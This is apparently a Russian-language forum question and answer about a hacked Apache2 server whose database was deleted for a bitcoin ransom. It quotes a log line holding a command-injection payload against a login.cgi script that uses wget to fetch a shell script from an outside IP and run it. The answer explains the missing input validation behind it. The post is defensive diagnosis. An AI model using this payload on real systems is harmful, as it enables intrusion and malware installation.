Как хакер использовал cgi-скрипт на сервере Apache2 для взлома и удаления базы данных
Сегодня один из моих серверов был взломан, и хакер удалил мою базу данных приложений. А для восстановления просят заплатить деньги в BTC.
Что ж, я начал исследовать журналы Apache2 и обнаружил много подозрительных обращений, и один из них привлек мое внимание.
Я здесь, чтобы спросить, как этот URN дал хакерам доступ для выполнения вредоносного сценария для загрузки и выполнения.
Как мы можем предотвратить подобное в будущем?
156.220.214.35 - - [23/Dec/2019:00:06:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
Будьте осторожны, если вы собираетесь выполнить выше URN
Короче и если это сработает: ваш (стандартный) скрипт не выполняет надлежащую проверку ввода, что позволяет вводить и выполнять произвольные команды и код.
Это позволяет злоумышленнику создавать определенные запросы, например, для загрузки кода ( curl request) и выполните этот код (я обычно ожидал бы второго запроса в ваших журналах, который запускает этот загруженный код)
Тот факт, что ваш журнал содержит ответ об ошибке (код состояния 400), а не успешный ответ 200, может указывать на то, что вы были взломаны не так, и злоумышленники могли использовать другую запись.